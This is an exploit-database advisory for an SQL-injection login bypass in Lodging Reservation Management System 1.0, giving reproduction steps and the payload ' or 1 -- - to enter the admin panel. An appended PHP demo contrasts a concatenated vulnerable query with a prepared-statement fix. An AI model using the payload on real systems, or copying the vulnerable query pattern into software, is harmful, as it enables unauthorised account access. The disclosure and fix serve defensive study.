Lodging reservation management system 1.0 authentication bypass Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-10-04 |
Type : webapps |
Platform : php
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description: The password input is affected by an authentication bypass because of improper sanitisation, which leads to unauthorised access to accounts.
# Steps To Reproduce:
Step 1 – Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.
# Go to the admin login page (http://localhost/lodge/admin/login.php), then use the payload below as username and password:
Username: ' or 1 -- -
Password: ' or 1 -- -
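
The fix for this class of flaw, as an added example that is not part of the original advisory or the application's source: the concatenated query in login_vulnerable() is an assumed shape for the bug, and the table, function names, sample password and in-memory SQLite database are constructed for illustration. The hardened path binds the username as a parameter and checks the password against a stored hash outside the SQL statement.

```php
<?php
// Added example: constructed schema and credentials, not the application's own code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
$seed = $pdo->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
$seed->execute(['admin', password_hash('constructed-sample-pass', PASSWORD_DEFAULT)]);

// Assumed vulnerable pattern: request values concatenated into the SQL text,
// so a quote in either field changes the structure of the WHERE clause.
function login_vulnerable(PDO $pdo, string $user, string $pass): ?array
{
    $sql = "SELECT id, username FROM users WHERE username = '$user' AND password = '$pass'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: the username is bound as data, and the password never enters the
// query; it is compared with the stored hash using password_verify().
function login_hardened(PDO $pdo, string $user, string $pass): ?array
{
    $stmt = $pdo->prepare('SELECT id, username, password FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password'])) {
        return null;
    }
    unset($row['password']); // do not hand the hash back to the caller
    return $row;
}

$payload = "' or 1 -- -"; // the value listed in the advisory above
$cases = [
    'vulnerable, advisory payload' => login_vulnerable($pdo, $payload, $payload),
    'hardened, advisory payload'   => login_hardened($pdo, $payload, $payload),
    'hardened, wrong password'     => login_hardened($pdo, 'admin', 'wrong'),
    'hardened, correct password'   => login_hardened($pdo, 'admin', 'constructed-sample-pass'),
];
foreach ($cases as $label => $result) {
    printf("%-30s => %s\n", $label, $result ? 'logged in as ' . $result['username'] : 'rejected');
}
```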